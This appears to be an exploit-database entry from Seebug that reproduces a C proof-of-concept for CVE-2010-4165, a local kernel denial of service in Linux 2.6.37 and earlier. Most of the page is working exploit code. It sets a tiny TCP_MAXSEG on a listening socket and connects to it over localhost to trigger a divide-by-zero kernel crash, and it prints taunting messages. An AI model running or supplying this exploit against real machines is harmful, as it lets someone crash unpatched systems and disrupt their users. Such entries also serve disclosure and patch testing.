Linux Kernel <= 2.6.37 Local Kernel Denial of Service

2011-03-0200:00:00

Root

www.seebug.org

0.0004 Low

EPSS

Percentile

0.4%

JSON

No description provided by source.


                                                /* Linux Kernel &lt;= 2.6.37 local kernel DoS (CVE-2010-4165)
 * =======================================================
 * A divide by 0 error occurs in tcp_select_initial_window
 * when processing user supplied TCP_MAXSEG facilitating a
 * local denial-of-service condition (kernel oops!) in all
 * Linux Kernel 2.6.x branch (2.6.37 &amp; below). This issue
 * can be triggered easily with a call to setsockopt() on
 * a listening network socket and then establishing a TCP
 * connection to the awaiting socket.
 *
 * -- prdelka
 *
 */
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;arpa/inet.h&gt;
#include &lt;netinet/tcp.h&gt;
 
 
int main() {
    int optval, optlen, ret, sd, sd2, pid;
    char *host = &quot;localhost&quot;;  
    struct sockaddr_in locAddr;
    struct sockaddr_in servAddr;
    struct sockaddr_in dstAddr;
    printf(&quot;[ Linux Kernel tcp_select_initial_window divide by 0 DoS\n&quot;);  
    sd = socket(AF_INET, SOCK_STREAM, 0);
    memset(&amp;servAddr,0,sizeof(servAddr));
    memset(&amp;dstAddr,0,sizeof(dstAddr));
        servAddr.sin_family = AF_INET;
        servAddr.sin_port = htons(60000);
        servAddr.sin_addr.s_addr = INADDR_ANY;
    dstAddr.sin_family = AF_INET;
    inet_aton(&quot;127.0.0.1&quot;, &amp;dstAddr.sin_addr);
    dstAddr.sin_port = htons(60000);
        if((bind(sd,(struct sockaddr *)&amp;servAddr,sizeof(struct sockaddr))) == -1){
                printf(&quot;[ Cannot bind listener service\n&quot;);
                exit(-1);
        }
    listen(sd,4);
    optval = 12;
    ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &amp;optval, sizeof(optval));
    if(ret==0)
    {
        printf(&quot;[ System is not patched against CVE-2010-4165\n[ Goodnight, sweet prince.\n&quot;);
        int sin_size = sizeof(struct sockaddr_in);
        switch(pid = fork())
        {
            case 0:
                sd = accept(sd,(struct sockaddr *)&amp;locAddr,&amp;sin_size);
                sleep(3);
            default:
                sd2 = socket(AF_INET, SOCK_STREAM, 0);
                connect(sd2, (struct sockaddr *)&amp;dstAddr, sizeof(dstAddr));
                sleep(3);
        }
    }
    printf(&quot;[ System is patched, no dreams for this prince\n&quot;);
    return 0;
}